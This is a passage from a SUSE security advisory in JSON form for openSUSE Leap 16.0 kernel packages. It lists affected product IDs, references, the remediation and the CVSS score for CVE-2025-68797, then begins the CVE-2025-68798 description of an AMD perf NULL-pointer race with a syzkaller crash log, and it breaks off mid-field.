"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 